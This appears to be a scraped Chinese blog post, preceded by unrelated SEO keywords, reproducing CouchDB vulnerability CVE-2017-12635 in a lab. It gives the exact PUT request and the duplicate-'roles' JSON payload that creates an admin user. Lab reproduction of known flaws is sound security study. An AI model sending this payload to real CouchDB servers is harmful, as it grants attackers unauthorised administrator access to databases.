石家庄网站推广公司,西瓜wordpress,制作网站需要怎么做的,后端开发和前端开发哪个工资高Couchdb 权限绕过漏洞复现#xff08;CVE-2017-12635#xff09;
开启环境给了三个端口号#xff0c;不知道哪个是正常的#xff0c;最后试出来52226端口正常。
登录URL#xff1a;http://192.168.91.129:52226/_utils/#
来到了登录页面
用postman发送PUT…Couchdb 权限绕过漏洞复现CVE-2017-12635
开启环境给了三个端口号不知道哪个是正常的最后试出来52226端口正常。
登录URLhttp://192.168.91.129:52226/_utils/#
来到了登录页面
用postman发送PUT方法的请求包这个请求包会导致数据库创建一个用户在这会把xrzx这个用户创建出来并且加入到admin管理员组里面去
然后再回到登录页面输入刚才创建的账号和密码登录即可
http://192.168.91.129:52226/_users/org.couchdb.user:xrzx
{
“type”: “user”,
“name”: “xrzx”,
“roles”: [“_admin”],
“roles”: [],
“password”: “admin”
}
